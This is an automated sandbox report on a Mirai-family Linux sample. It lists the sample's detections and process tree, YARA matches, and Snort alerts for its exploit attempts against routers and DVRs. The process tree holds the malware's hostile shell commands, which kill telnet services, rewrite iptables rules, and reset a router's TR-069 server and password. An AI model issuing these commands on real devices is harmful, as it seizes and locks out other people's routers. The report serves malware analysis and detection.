Linux Analysis Report bin.sh

Overview

General Information

Sample Name: bin.sh
Analysis ID: 522924
MD5: eec5c6c219535fba3a0492ea8118b397
SHA1: 292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256: 12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef

Detection

Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Antivirus detection for dropped file
Sample tries to persist itself using System V runlevels
Opens /proc/net/* files useful for finding connected devices and routers
Sample tries to persist itself using /etc/profile
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Uses known network protocols on non-standard ports
Executes the "iptables" command to insert, remove and/or manipulate rules
Sample reads /proc/mounts (often used for finding a writable filesystem)
Terminates several processes with shell command 'killall'
Writes ELF files to disk
Yara signature match
Writes shell script files to disk
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Writes HTML files containing JavaScript to disk
Sample has stripped symbol table
Executes the "iptables" command used for managing IP filtering and manipulation
Executes the "modprobe" command used for loading kernel modules
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter

Analysis Advice

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures
Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 522924
Start date: 16.11.2021
Start time: 15:43:38
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 43s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: bin.sh
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Analysis Mode: default
Detection: MAL
Classification: mal100.spre.troj.evad.linSH@0/221@4/0
Warnings:
  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
  • Created / dropped Files have been reduced to 100
  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/522924/sample/bin.sh

Process Tree

  • system is lnxubuntu1
  • bin.sh (PID: 6777, Parent: 6712, MD5: eec5c6c219535fba3a0492ea8118b397) Arguments: /usr/bin/qemu-arm /tmp/bin.sh
    • bin.sh New Fork (PID: 6790, Parent: 6777)
      • bin.sh New Fork (PID: 6792, Parent: 6790)
        • bin.sh New Fork (PID: 6794, Parent: 6792)
        • sh (PID: 6794, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
          • sh New Fork (PID: 6797, Parent: 6794)
          • killall (PID: 6797, Parent: 6794, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 telnetd utelnetd scfgmgr
        • bin.sh New Fork (PID: 6813, Parent: 6792)
        • bin.sh New Fork (PID: 6814, Parent: 6792)
        • bin.sh New Fork (PID: 6815, Parent: 6792)
          • bin.sh New Fork (PID: 6825, Parent: 6815)
          • sh (PID: 6825, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT"
            • sh New Fork (PID: 6827, Parent: 6825)
            • iptables (PID: 6827, Parent: 6825, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT
              • iptables New Fork (PID: 6842, Parent: 6827)
              • modprobe (PID: 6842, Parent: 6827, MD5: 3d0e6fb594a9ad9c854ace3e507f86c5) Arguments: /sbin/modprobe ip_tables
          • bin.sh New Fork (PID: 6855, Parent: 6815)
          • sh (PID: 6855, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT"
            • sh New Fork (PID: 6857, Parent: 6855)
            • iptables (PID: 6857, Parent: 6855, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT
          • bin.sh New Fork (PID: 6858, Parent: 6815)
          • sh (PID: 6858, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT"
            • sh New Fork (PID: 6863, Parent: 6858)
            • iptables (PID: 6863, Parent: 6858, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT
          • bin.sh New Fork (PID: 6893, Parent: 6815)
          • sh (PID: 6893, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT"
            • sh New Fork (PID: 6897, Parent: 6893)
            • iptables (PID: 6897, Parent: 6893, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT
          • bin.sh New Fork (PID: 6904, Parent: 6815)
          • sh (PID: 6904, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 47453 -j ACCEPT"
            • sh New Fork (PID: 6913, Parent: 6904)
            • iptables (PID: 6913, Parent: 6904, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 47453 -j ACCEPT
          • bin.sh New Fork (PID: 6932, Parent: 6815)
          • sh (PID: 6932, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT"
            • sh New Fork (PID: 6935, Parent: 6932)
            • iptables (PID: 6935, Parent: 6932, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT
          • bin.sh New Fork (PID: 6940, Parent: 6815)
          • sh (PID: 6940, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT"
            • sh New Fork (PID: 6948, Parent: 6940)
            • iptables (PID: 6948, Parent: 6940, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT
          • bin.sh New Fork (PID: 6967, Parent: 6815)
          • sh (PID: 6967, Parent: 6815, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT"
            • sh New Fork (PID: 6973, Parent: 6967)
            • iptables (PID: 6973, Parent: 6967, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT
        • bin.sh New Fork (PID: 6819, Parent: 6792)
        • bin.sh New Fork (PID: 6821, Parent: 6792)
        • bin.sh New Fork (PID: 6823, Parent: 6792)
        • bin.sh New Fork (PID: 6990, Parent: 6792)
        • sh (PID: 6990, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
          • sh New Fork (PID: 6992, Parent: 6990)
          • iptables (PID: 6992, Parent: 6990, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
        • bin.sh New Fork (PID: 6993, Parent: 6792)
        • sh (PID: 6993, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
          • sh New Fork (PID: 6995, Parent: 6993)
          • iptables (PID: 6995, Parent: 6993, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
        • bin.sh New Fork (PID: 6996, Parent: 6792)
        • sh (PID: 6996, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
          • sh New Fork (PID: 6998, Parent: 6996)
          • iptables (PID: 6998, Parent: 6996, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 58000 -j DROP
        • bin.sh New Fork (PID: 7002, Parent: 6792)
        • sh (PID: 7002, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
          • sh New Fork (PID: 7010, Parent: 7002)
          • iptables (PID: 7010, Parent: 7002, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
        • bin.sh New Fork (PID: 7031, Parent: 6792)
        • sh (PID: 7031, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
        • bin.sh New Fork (PID: 7047, Parent: 6792)
        • sh (PID: 7047, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
        • bin.sh New Fork (PID: 7060, Parent: 6792)
        • sh (PID: 7060, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
          • sh New Fork (PID: 7067, Parent: 7060)
          • iptables (PID: 7067, Parent: 7060, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
        • bin.sh New Fork (PID: 7087, Parent: 6792)
        • sh (PID: 7087, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
          • sh New Fork (PID: 7093, Parent: 7087)
          • iptables (PID: 7093, Parent: 7087, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
        • bin.sh New Fork (PID: 7114, Parent: 6792)
        • sh (PID: 7114, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
          • sh New Fork (PID: 7122, Parent: 7114)
          • iptables (PID: 7122, Parent: 7114, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
        • bin.sh New Fork (PID: 7140, Parent: 6792)
        • sh (PID: 7140, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
          • sh New Fork (PID: 7145, Parent: 7140)
          • iptables (PID: 7145, Parent: 7140, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
        • bin.sh New Fork (PID: 7158, Parent: 6792)
        • sh (PID: 7158, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
          • sh New Fork (PID: 7163, Parent: 7158)
          • iptables (PID: 7163, Parent: 7158, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
        • bin.sh New Fork (PID: 7171, Parent: 6792)
        • sh (PID: 7171, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
          • sh New Fork (PID: 7179, Parent: 7171)
          • iptables (PID: 7179, Parent: 7171, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
        • bin.sh New Fork (PID: 7194, Parent: 6792)
        • sh (PID: 7194, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
          • sh New Fork (PID: 7200, Parent: 7194)
          • iptables (PID: 7200, Parent: 7194, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 35000 -j DROP
        • bin.sh New Fork (PID: 7209, Parent: 6792)
        • sh (PID: 7209, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
          • sh New Fork (PID: 7216, Parent: 7209)
          • iptables (PID: 7216, Parent: 7209, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 50023 -j DROP
        • bin.sh New Fork (PID: 7224, Parent: 6792)
        • sh (PID: 7224, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
          • sh New Fork (PID: 7230, Parent: 7224)
          • iptables (PID: 7230, Parent: 7224, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
        • bin.sh New Fork (PID: 7241, Parent: 6792)
        • sh (PID: 7241, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
          • sh New Fork (PID: 7248, Parent: 7241)
          • iptables (PID: 7248, Parent: 7241, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
        • bin.sh New Fork (PID: 7255, Parent: 6792)
        • sh (PID: 7255, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
          • sh New Fork (PID: 7261, Parent: 7255)
          • iptables (PID: 7261, Parent: 7255, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 7547 -j DROP
        • bin.sh New Fork (PID: 7280, Parent: 6792)
        • sh (PID: 7280, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
          • sh New Fork (PID: 7290, Parent: 7280)
          • iptables (PID: 7290, Parent: 7280, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
        • bin.sh New Fork (PID: 7314, Parent: 6792)
        • sh (PID: 7314, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT"
          • sh New Fork (PID: 7316, Parent: 7314)
          • iptables (PID: 7316, Parent: 7314, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT
        • bin.sh New Fork (PID: 7317, Parent: 6792)
        • sh (PID: 7317, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT"
          • sh New Fork (PID: 7319, Parent: 7317)
          • iptables (PID: 7319, Parent: 7317, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT
        • bin.sh New Fork (PID: 7321, Parent: 6792)
        • sh (PID: 7321, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT"
          • sh New Fork (PID: 7327, Parent: 7321)
          • iptables (PID: 7327, Parent: 7321, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT
        • bin.sh New Fork (PID: 7344, Parent: 6792)
        • sh (PID: 7344, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT"
          • sh New Fork (PID: 7351, Parent: 7344)
          • iptables (PID: 7351, Parent: 7344, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT
        • bin.sh New Fork (PID: 7369, Parent: 6792)
        • sh (PID: 7369, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --dport 4000 -j ACCEPT"
          • sh New Fork (PID: 7378, Parent: 7369)
          • iptables (PID: 7378, Parent: 7369, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --dport 4000 -j ACCEPT
        • bin.sh New Fork (PID: 7395, Parent: 6792)
        • sh (PID: 7395, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT"
          • sh New Fork (PID: 7405, Parent: 7395)
          • iptables (PID: 7405, Parent: 7395, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT
        • bin.sh New Fork (PID: 7420, Parent: 6792)
        • sh (PID: 7420, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT"
          • sh New Fork (PID: 7426, Parent: 7420)
          • iptables (PID: 7426, Parent: 7420, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT
        • bin.sh New Fork (PID: 7432, Parent: 6792)
        • sh (PID: 7432, Parent: 6792, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT"
          • sh New Fork (PID: 7439, Parent: 7432)
          • iptables (PID: 7439, Parent: 7432, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT
  • upstart New Fork (PID: 7470, Parent: 3310)
  • sh (PID: 7470, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 7471, Parent: 7470)
    • date (PID: 7471, Parent: 7470, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 7472, Parent: 7470)
    • apport-checkreports (PID: 7472, Parent: 7470, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system
  • upstart New Fork (PID: 7497, Parent: 3310)
  • sh (PID: 7497, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 7498, Parent: 7497)
    • date (PID: 7498, Parent: 7497, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 7504, Parent: 7497)
    • apport-gtk (PID: 7504, Parent: 7497, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • upstart New Fork (PID: 7524, Parent: 3310)
  • sh (PID: 7524, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 7525, Parent: 7524)
    • date (PID: 7525, Parent: 7524, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 7526, Parent: 7524)
    • apport-gtk (PID: 7526, Parent: 7524, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • cleanup

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
bin.sh | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth |
  • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
bin.sh | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security |
bin.sh | JoeSecurity_Mirai_9 | Yara detected Mirai | Joe Security |
bin.sh | JoeSecurity_Mirai_6 | Yara detected Mirai | Joe Security |
bin.sh | JoeSecurity_Mirai_4 | Yara detected Mirai | Joe Security |

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Mirai_12 | Yara detected Mirai | Joe Security |

Dropped Files

Source | Rule | Description | Author | Strings
/usr/networks | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth |
  • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
/usr/networks | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security |
/usr/networks | JoeSecurity_Mirai_9 | Yara detected Mirai | Joe Security |
/usr/networks | JoeSecurity_Mirai_6 | Yara detected Mirai | Joe Security |
/usr/networks | JoeSecurity_Mirai_4 | Yara detected Mirai | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp | JoeSecurity_Mirai_4 | Yara detected Mirai | Joe Security |
6821.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp | JoeSecurity_Mirai_4 | Yara detected Mirai | Joe Security |
6790.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp | JoeSecurity_Mirai_4 | Yara detected Mirai | Joe Security |
6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth |
  • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp | JoeSecurity_Mirai_5 | Yara detected Mirai | Joe Security |

Jbx Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
  • Source: bin.sh, Avira: detected
Multi AV Scanner detection for submitted file
  • Source: bin.sh, Metadefender: Detection: 54%
  • Source: bin.sh, ReversingLabs: Detection: 75%
Antivirus detection for dropped file
  • Source: /usr/networks, Avira: detection malicious, Label: LINUX/Mirai.lldau

Spreading:

Opens /proc/net/* files useful for finding connected devices and routers
  • Source: /tmp/bin.sh (PID: 6815), Opens: /proc/net/route
  • Source: /tmp/bin.sh (PID: 6815), Opens: /proc/net/route

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
  • Source: Traffic, Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:57282 -> 221.128.175.114:80
  • Source: Traffic, Snort IDS: 1251 INFO TELNET Bad Login 123.0.249.125:23 -> 192.168.2.20:55784
  • Source: Traffic, Snort IDS: 718 INFO TELNET login incorrect 123.0.249.125:23 -> 192.168.2.20:55784
  • Source: Traffic, Snort IDS: 1251 INFO TELNET Bad Login 123.0.249.125:23 -> 192.168.2.20:55824
  • Source: Traffic, Snort IDS: 718 INFO TELNET login incorrect 123.0.249.125:23 -> 192.168.2.20:55824
  • Source: Traffic, Snort IDS: 1251 INFO TELNET Bad Login 123.0.249.125:23 -> 192.168.2.20:56102
  • Source: Traffic, Snort IDS: 718 INFO TELNET login incorrect 123.0.249.125:23 -> 192.168.2.20:56102
  • Source: Traffic, Snort IDS: 1251 INFO TELNET Bad Login 123.0.249.125:23 -> 192.168.2.20:56382
  • Source: Traffic, Snort IDS: 718 INFO TELNET login incorrect 123.0.249.125:23 -> 192.168.2.20:56382
  • Source: Traffic, Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:45982 -> 70.38.30.153:80
  • Source: Traffic, Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:45982 -> 70.38.30.153:80
  • Source: Traffic, Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:33058 -> 104.103.72.220:80
  • Source: Traffic, Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:33058 -> 104.103.72.220:80
  • Source: Traffic, Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.103.72.220:80 -> 192.168.2.20:33058
  • Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:60718 -> 3.113.149.148:80
  • Source: Traffic, Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:38508 -> 52.54.104.1:80
  • Source: Traffic, Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:60718 -> 3.113.149.148:80
  • Source: Traffic, Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:36526 -> 15.164.228.23:80
  • Source: Traffic, Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:36526 -> 15.164.228.23:80
  • Source: Traffic, Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:51860 -> 66.180.167.13:80
  • Source: Traffic, Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:51860 -> 66.180.167.13:80
  • Source: Traffic, Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:33706 -> 104.69.40.99:80
  • Source: Traffic, Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:33706 -> 104.69.40.99:80
  • Source: Traffic, Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.69.40.99:80 -> 192.168.2.20:33706
  • Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:38172 -> 122.201.116.141:80
  • Source: Traffic, Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:38172 -> 122.201.116.141:80
  • Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:40608 -> 201.49.41.72:80
  • Source: Traffic, Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:40608 -> 201.49.41.72:80
  • Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:36730 -> 216.180.103.7:80
  • Source: Traffic, Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:36730 -> 216.180.103.7:80
  • Source: Traffic, Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:40506 -> 139.59.180.200:80
  • Source: Traffic, Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:40506 -> 139.59.180.200:80
  • Source: Traffic, Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:45410 -> 45.204.39.235:80
  • Source: Traffic, Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:45410 -> 45.204.39.235:80
  • Source: Traffic, Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:53170 -> 154.208.92.84:80
  • Source: Traffic, Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:53170 -> 154.208.92.84:80
  • Source: Traffic, Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:47632 -> 13.112.197.38:80
  • Source: Traffic, Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:47632 -> 13.112.197.38:80
  • Source: Traffic, Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:43200 -> 175.119.69.229:80
  • Source: Traffic, Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:35942 -> 91.195.35.202:8080
